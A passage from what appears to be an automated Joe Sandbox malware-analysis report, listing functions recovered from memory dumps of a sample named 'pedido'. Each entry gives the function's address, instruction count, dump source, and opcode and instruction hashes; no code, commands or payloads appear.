Opcode Fuzzy Hash: be8e0765c107ef4b95f832c0592b8d60d28b1e45b790bf665b8bc1e52c3409f8
Instruction Fuzzy Hash: BAA19075E01228CFEB28CF6AD944B9DBAF2BF89301F14C1AAD40DA7251DB305A85CF50

Function 058EB8E0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 507d8f496d260744a57b1e48ed34521c5e2a92f700755838251303a683d3a3aa
Instruction ID: 95184d00f20a7fd92ff89bfa7fb50d564fdddf117d779f9f5278363166e5c30c
Opcode Fuzzy Hash: 507d8f496d260744a57b1e48ed34521c5e2a92f700755838251303a683d3a3aa
Instruction Fuzzy Hash: 96A19175E012188FEB28CF6AD944B9DBAF2BF89301F14C0AAD80DB7255DB705A85CF50

Function 058ED218 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573db1d557594cd7bf68547e7b985925becfd489dd3762cae2a7bdc16f605e4d
Instruction ID: 5ecd09303087c94a1c9d8afcecf78f44f0b4e4c59a386e7b9309cbdc1ac016de
Opcode Fuzzy Hash: 573db1d557594cd7bf68547e7b985925becfd489dd3762cae2a7bdc16f605e4d
Instruction Fuzzy Hash: 39A18275E012288FEB28CF6AD944B9DBAF2BF89300F14C0AAD40DB7255DB305A85CF51

Function 058ECBD0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b1853d43417739666e3047fef48600b802929e9b50094611d8a774544b528bb
Instruction ID: 1152f407ffea55c914806bf2321c57840d2a5af9b245c05296f6c0a15e7f5d11
Opcode Fuzzy Hash: 2b1853d43417739666e3047fef48600b802929e9b50094611d8a774544b528bb
Instruction Fuzzy Hash: 23A18175E012188FEB28DF6AD944B9DBAF2BF89300F14C1AAD409A7255DB305E85CF50

Function 058EA600 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d89ee8758815899d45ede630b7ff7078161b978b5042b2b5660223f21322b777
Instruction ID: 84771e8ac98ac66061510b279b43df5ea7a038ff1ea09c81dcfe7d83005e7c35
Opcode Fuzzy Hash: d89ee8758815899d45ede630b7ff7078161b978b5042b2b5660223f21322b777
Instruction Fuzzy Hash: D5A19075E012288FEB28DF6AD944B9DBAF2BF89300F14C1AAD40DB7255DB345A85CF50

Function 058EAC48 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf41eb4fc975d4ccdb0b15ca889c45c20da8fe4d9f4f51eb2110a5541d6a4971
Instruction ID: 081e3e39b0e138f43a43daab3b8eaf88993edacbd484a29568f1db1ddeb280bd
Opcode Fuzzy Hash: cf41eb4fc975d4ccdb0b15ca889c45c20da8fe4d9f4f51eb2110a5541d6a4971
Instruction Fuzzy Hash: 56A170B5E012188FEB28CF6AD944B9DBAF2BF89300F14C1AAD409A7255DB345A85CF51

Function 0124BBB8 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3f2df635962c876bc55211d15bed334bc19067b893dbcc4360a4d57eb3b411
Instruction ID: cefd99f1da35fdebe86c4a40931a5ea348ddf3d1c9a08bcd6260a4603fdb9e13
Opcode Fuzzy Hash: 4b3f2df635962c876bc55211d15bed334bc19067b893dbcc4360a4d57eb3b411
Instruction Fuzzy Hash: D791F674E10218CFEB18DFA9D884A9DBBF2FF89300F1480A9E549AB365DB309945CF51

Function 058EAC37 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 507ecfc0ed6cfe99557beb081e9dd26f86bbb1b92bcbb069ace699a033eb5677
Instruction ID: ec8933d875abb460112e38181952ab8cf056a0a153b242dff49cc8a0ceb1276b
Opcode Fuzzy Hash: 507ecfc0ed6cfe99557beb081e9dd26f86bbb1b92bcbb069ace699a033eb5677
Instruction Fuzzy Hash: 6A91A671E00618CFEB28CF6AC944B9EBBF2AF89304F14C1AAD409B7255DB745A85CF51

Function 058E8BC2 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3de0e3a9a8ae5abccb35512c136cdaf6b4bdd19626a17af76f65494e84a1db16
Instruction ID: 552c64f0da509ed50bada0c9b03339e2dedb9d67b932ee863470ec2ed8564265
Opcode Fuzzy Hash: 3de0e3a9a8ae5abccb35512c136cdaf6b4bdd19626a17af76f65494e84a1db16
Instruction Fuzzy Hash: E091CF70E00218CFDB58DFAAD884AADBBF2BF89300F20856AD819AB255DB315945CF50

Function 01244AD9 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 655bb8002b586e9cd440693d55fbdb7281c9622e7ad557f461da0febfb550cec
Instruction ID: 943abcc72f96302af7abc2238502134416d394aca2834b2eb4fc4e470c7c4125
Opcode Fuzzy Hash: 655bb8002b586e9cd440693d55fbdb7281c9622e7ad557f461da0febfb550cec
Instruction Fuzzy Hash: 3181B174E10258DFEB18DFAAD984B9DBBF2BF88300F148069E819AB365DB305945CF50

Function 0124BEB0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffe7a8f794ea399b01c30bd8a93a4253588b3844da1e8945c41498b06a4a12c8
Instruction ID: 761b8851bc8d8bcf29faa4687cde098196544b25c857135f51a9074af986e36b
Opcode Fuzzy Hash: ffe7a8f794ea399b01c30bd8a93a4253588b3844da1e8945c41498b06a4a12c8
Instruction Fuzzy Hash: 5581D374E11208CFEB18DFAAD884A9DBBF2FF89300F109069E509AB365DB309945CF10

Function 0124CA32 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c8fd7f382c668e1ca5ebe356ca375067ad700a545b33048359373d7da1a65b
Instruction ID: abca315f1e1ec68e8fcd97d01a9534111aaf0f9c52d7da0e5f8b54d573f9c303
Opcode Fuzzy Hash: f2c8fd7f382c668e1ca5ebe356ca375067ad700a545b33048359373d7da1a65b
Instruction Fuzzy Hash: B681A374E11218CFEB18DFAAD984A9DBBF2FF88300F148069E819AB365DB305945DF50

Function 0124C190 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 331a638cb7ff71b510f841dea50b83f21c02d4f0efafb6e0f58fe9625f324551
Instruction ID: 3685d83440b69d5907addc7f10298693ae217d4da209f155d04d42d56090af86
Opcode Fuzzy Hash: 331a638cb7ff71b510f841dea50b83f21c02d4f0efafb6e0f58fe9625f324551
Instruction Fuzzy Hash: 1E81B474E11218CFEB18DFAAD984A9DBBF2BF89300F148069E419AB365DB705945CF50

Function 0124C470 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e73f4f3f3ae4f2412d8befb83025acb0b180bfd73b0918a77b320951a0b0b7
Instruction ID: 729a74b5fa05a9924ef519fb580752db39d2c676146e879503023d1a6f945bd7
Opcode Fuzzy Hash: b6e73f4f3f3ae4f2412d8befb83025acb0b180bfd73b0918a77b320951a0b0b7
Instruction Fuzzy Hash: E481B174E11218CFEB18DFAAD984A9DBBF2BF88300F14D069E419AB365DB309945CF51

Function 0124C752 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f5ab74f0db68a464e4d9d41a3c7735259b5831bc1b3cf8e0b24fb532289fca
Instruction ID: 461d5b06217709df25a0cf525793566bf959238a817eb169728376b3fb653303
Opcode Fuzzy Hash: 36f5ab74f0db68a464e4d9d41a3c7735259b5831bc1b3cf8e0b24fb532289fca
Instruction Fuzzy Hash: 7A81C374E11218DFEB18DFAAD984AADBBF2FF88310F148069E449AB365DB305941CF50

Function 058ECBC0 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92733b240d25a5df2e5ab1eefc7675b4402f796ae246f009354642c1a520ad2d
Instruction ID: 741db24b98817c1158506444793e93680c38c95995842272c836b16e0d6e9a68
Opcode Fuzzy Hash: 92733b240d25a5df2e5ab1eefc7675b4402f796ae246f009354642c1a520ad2d
Instruction Fuzzy Hash: 05718371E016288FEB68CF6AD944B9DFBF2AF89300F14C0AAD50DA7255DB305A85CF51

Function 058EA5F0 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba7b63e35083065d685251e70233e24a46b1be35bddd4fbaacc72243b9175a88
Instruction ID: 17283f2052a22e252ad6b5f9f838510cf4a08f15ea90ac3831101e483f91dddf
Opcode Fuzzy Hash: ba7b63e35083065d685251e70233e24a46b1be35bddd4fbaacc72243b9175a88
Instruction Fuzzy Hash: 88718371E01618CFEB68CF6AC944B9DBAF2AF89300F14C0AAD40DA7255DB344A85CF10

Function 0124B4F2 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 560009e1865126084bb4a860f56c7be609c5b295207e70f4c0145b4b11d834cc
Instruction ID: 8f51ba9a79d65a222ce534ad5f0ff700f3c462840ad51acc41340745d6a074f0
Opcode Fuzzy Hash: 560009e1865126084bb4a860f56c7be609c5b295207e70f4c0145b4b11d834cc
Instruction Fuzzy Hash: A261D575E006089FEB18DFAAD984A9DBBF2FF88300F14C029E419AB365DB309941CF51

Function 058E85A4 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f20a9661bd94c9a40656a467d850c7b4884642793bc3c98295b6cfbb59f599b
Instruction ID: aaf1f9cb8764fdfd2ca91d17ee00773295ec823df2b9515f78330eadd5bc0ddd
Opcode Fuzzy Hash: 7f20a9661bd94c9a40656a467d850c7b4884642793bc3c98295b6cfbb59f599b
Instruction Fuzzy Hash: 5841A2B1D002088BEB18DFAAD95479EBBF2BF89300F14D16AD818BB254DB354946CF54

Function 058E9FA0 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a6fcf58c1c08d1651ec31a36357537d7a8dd18e34364205b4017bbceae16571
Instruction ID: 0fc55fc5b89e55d7b23f9f6fe111dd33b0bd0b807af3476878feb11f43c2d0bb
Opcode Fuzzy Hash: 2a6fcf58c1c08d1651ec31a36357537d7a8dd18e34364205b4017bbceae16571
Instruction Fuzzy Hash: C04146B1E016188BEB58CF6BD9457DAFAF3AFC9304F14C1AAD50CA6264DB740A858F11

Function 058EBF20 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 189fe056352cebc3b49199a22a23243e3e4e28f3bfc1cc3fb6d894e3ddd5d4fe
Instruction ID: 82d6c9dd53e629ed5b2398cebda49f6991d26554f93e0091113a96e5c5010b57
Opcode Fuzzy Hash: 189fe056352cebc3b49199a22a23243e3e4e28f3bfc1cc3fb6d894e3ddd5d4fe
Instruction Fuzzy Hash: 3F4148B1D016188BEB58CF6BD9457CAFAF3AFC9300F04C1AAD50CA6264DB741A858F51

Function 058EC570 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76a4b26c91352057bfdfe8ab1b312dff5e48d54a1044c471ecd470ef162839a8
Instruction ID: 0c0746baa8449f0dc58e9a0513abc68636c21a410831fe08816137463de60af9
Opcode Fuzzy Hash: 76a4b26c91352057bfdfe8ab1b312dff5e48d54a1044c471ecd470ef162839a8
Instruction Fuzzy Hash: A14166B1E016188BEB58CF6BDD457CAFAF3AFC9300F14C1AAD50CA6264DB744A858F51

Function 058EB8D0 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae55e353c4a89d03daf3a3da9ae5114a19d66b75428bfccd6532dcaf38e54b4b
Instruction ID: cf347b4a3424c23430befe5c1ec8da50e7db242e60c0fa880537a930a9bd71c3
Opcode Fuzzy Hash: ae55e353c4a89d03daf3a3da9ae5114a19d66b75428bfccd6532dcaf38e54b4b
Instruction Fuzzy Hash: DE415BB1E016188BEB58CF6BD9457C9FAF3AFC9300F04C1AAD50CA7264DB741A858F51

Function 058EB281 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1318eb797641458bc621a3cff3f3262ef6d8ae88cc4a44cb9f855e38906b1d1
Instruction ID: e57e550511cc6eaa8d3ad20cb6eedc738bff09f231d5bfae9433cf54be29474f
Opcode Fuzzy Hash: d1318eb797641458bc621a3cff3f3262ef6d8ae88cc4a44cb9f855e38906b1d1
Instruction Fuzzy Hash: 4D4165B1E016188BEB58CF6BD9457DEFAF3AFC9310F04C1AAD50CA6264DB740A858F50

Function 058ED20A Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcbce48bdccffa2846758a8b991cd52911c1c47702df018168782c9f6887de37
Instruction ID: 9610840f0f1501092ce2d122d4ffef13a1bc6f6766d75ea071ec98de600f528e
Opcode Fuzzy Hash: bcbce48bdccffa2846758a8b991cd52911c1c47702df018168782c9f6887de37
Instruction Fuzzy Hash: 454157B1E016188BEB58CF6BD9457CEFAF3AFC9304F14C1AAC50CA6265DB740A858F51

Function 012495D4 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

T, xrefs: 012495E6

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID: T
API String ID: 0-3187964512
Opcode ID: fcb6f8febf1852473cff5f7cf675ce11de9b4e664c16a3e9209a039d9e7d5971
Instruction ID: af6aed8a304f8dc3b6993dd40a43df7dc944eb257554edf3294205e40b854a40
Opcode Fuzzy Hash: fcb6f8febf1852473cff5f7cf675ce11de9b4e664c16a3e9209a039d9e7d5971
Instruction Fuzzy Hash: 4081F5706143468FDF09CB6CC480ABBBBB5EF89304F1884AAD545CB2A2D675DC82CB91

Function 01241F61 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

T, xrefs: 01241F6C

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID: T
API String ID: 0-286829874
Opcode ID: 006c2ac554a5aec2deeb810c351b5fbc24bb87cf552173cb8189d49b99b1d473
Instruction ID: 4af15461f5081937fb0a58cdfd11e3b7c63d91a0ead2d14f83109e224d9a01e4
Opcode Fuzzy Hash: 006c2ac554a5aec2deeb810c351b5fbc24bb87cf552173cb8189d49b99b1d473
Instruction Fuzzy Hash: 3E21E0B4C052498FCB05EFB9E8495EDBFF0BF5A300F1051AAD805F6264EB301A49CBA1

Function 012477F0 Relevance: .7, Instructions: 706COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb69c1b7eb3ca96de1787faff4a43e0981b2cd1775511a8fa2a3c4a7df46661f
Instruction ID: c88a7504674c74cbf934b69e90b6d06436dfd8d14f11ab79a691b2058032deec
Opcode Fuzzy Hash: eb69c1b7eb3ca96de1787faff4a43e0981b2cd1775511a8fa2a3c4a7df46661f
Instruction Fuzzy Hash: 51520F34A102188FEB14DBE4D860B9EBB76FF88700F1080AAD50A6B7A5DF355E85DF51

Function 012487E9 Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fb722ac59721dabeaf804c38a286710ec0e1eac6efbee8c77a9a7cea5281c6a
Instruction ID: c1b54b2c15f9785e43e27336e6542002b631770a704d8234fc09d748c0342288
Opcode Fuzzy Hash: 5fb722ac59721dabeaf804c38a286710ec0e1eac6efbee8c77a9a7cea5281c6a
Instruction Fuzzy Hash: 9AF19370334612CFEB1D9ABDC959B393B96AF85604F1844AAE642CF3B1EA75CC81C741

Function 01246E58 Relevance: .5, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d177c17d80e892101aba5e68224af13c81c20dcfadebcd28de0fd01176cccfa
Instruction ID: 95c595c8a50c0ba54887bd545c13621ffa327e8c50c020b5ae3cdb1262f10dac
Opcode Fuzzy Hash: 6d177c17d80e892101aba5e68224af13c81c20dcfadebcd28de0fd01176cccfa
Instruction Fuzzy Hash: A2128C30A102098FDB19CF68D884AAEBBF2FF89314F158559E919DB3A1D731ED41CB50

Function 01240C8F Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766cfea6b250ca9a6943c67ed310c48caa48612b176bbcee5a1ae79e9e59dee1
Instruction ID: b4fed140d870ca2ca10f97781c66fe898555c69ea1d3502477564e4b6aded878
Opcode Fuzzy Hash: 766cfea6b250ca9a6943c67ed310c48caa48612b176bbcee5a1ae79e9e59dee1
Instruction Fuzzy Hash: E422A675D00259CFCB54EF64E998A9DBBB2FF88301F1085A9E809A7369DB306D85CF41

Function 0124A84F Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec0a789950c1e2694ff14449988bace9aceeabc7dae94d07ee97e464f8c5d7ff
Instruction ID: 3501bfd1bea66e701266087396a282f425c07ba1407a2757ff2c0d7bf822de74
Opcode Fuzzy Hash: ec0a789950c1e2694ff14449988bace9aceeabc7dae94d07ee97e464f8c5d7ff
Instruction Fuzzy Hash: 51F13C75A502158FDB19CF6CC884AADBBF6FF98310B1A8469E506EB361DB31EC41CB50

Function 01240CA0 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f28fcf84c2001c9131a7ab7b59c341a293ae9e0d7e01c465985cb6d72bd324d
Instruction ID: 86ee1d9d0075d9d2e4fe52f5fde2ac2592966e9093ddcc2648db5b4eee2578ae
Opcode Fuzzy Hash: 6f28fcf84c2001c9131a7ab7b59c341a293ae9e0d7e01c465985cb6d72bd324d
Instruction Fuzzy Hash: AE228675D00259CFCB54EF64E998A9DBBB2FF88301F1085A9E909A7368DB306D85CF41

Function 012456A8 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0680692ebbd630a2c71f564b96008bfc6d14a8eb416443200e5bb1806933a4bc
Instruction ID: 368e192c2d6e9a23ef7c4abd6633f15050dc3a9181afbe9f9bbd8e824b43962b
Opcode Fuzzy Hash: 0680692ebbd630a2c71f564b96008bfc6d14a8eb416443200e5bb1806933a4bc
Instruction Fuzzy Hash: 9BB1BD317242158FEB2A9F78D888B7E7BE2AB89314F048529E586CB395DF74CC41C791

Function 01245C08 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b96d6a7a815fcbce21328e56071ee822b7bd9a1544a494980c1a478b7eca3e8
Instruction ID: a82a891f9765cee71f862a73b96856b6fceebd23486d996bda1e6a4cb127720b
Opcode Fuzzy Hash: 8b96d6a7a815fcbce21328e56071ee822b7bd9a1544a494980c1a478b7eca3e8
Instruction Fuzzy Hash: 5B819231B20506DFDB2CDF6DC488AA9BBB2FF89210B148169D696DB365D731DC42CB50

Function 058E94B8 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 476dce84e3c3767366c7e985322f1355616bbfab75f4c7c02fb25b08e21a6875
Instruction ID: 85fd045796af9654f9c04a4ea93985f71812f4e46d6897bb291b67d57ad1694f
Opcode Fuzzy Hash: 476dce84e3c3767366c7e985322f1355616bbfab75f4c7c02fb25b08e21a6875
Instruction Fuzzy Hash: FE718031F002199BDB19DFB5D8546AEBBB6AFC5700F14842AE806F7380DF749D4287A1

Function 01247438 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef5a40329d8e0cc9e8ef68f32dcaf20e86eae80a619c2240743fd1299ecba6f2
Instruction ID: 256410b9d646237f24be97a6048285725ae4663d9b5a65d430711376a919ea3c
Opcode Fuzzy Hash: ef5a40329d8e0cc9e8ef68f32dcaf20e86eae80a619c2240743fd1299ecba6f2
Instruction Fuzzy Hash: 3471ED347202468FDB19DF2CD498A6D7BE6EF49640F1540A9EA26CB3B1DB74DC41CB90

Function 0124CEC7 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1755bcbbc3f81831c05d0d696cec4bf6f76ac17212300d12ec3e4b9b1989a0e
Instruction ID: fd9a45fbe38b9912dbfdf479e718988bcd0f55dd06117515b31f033a30aad5dc
Opcode Fuzzy Hash: b1755bcbbc3f81831c05d0d696cec4bf6f76ac17212300d12ec3e4b9b1989a0e
Instruction Fuzzy Hash: 4A51D43122178F8FC3242BA2B9EC16A7B64FB4F327B45AC14F19E950A9DB305458CF14

Function 0124CED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

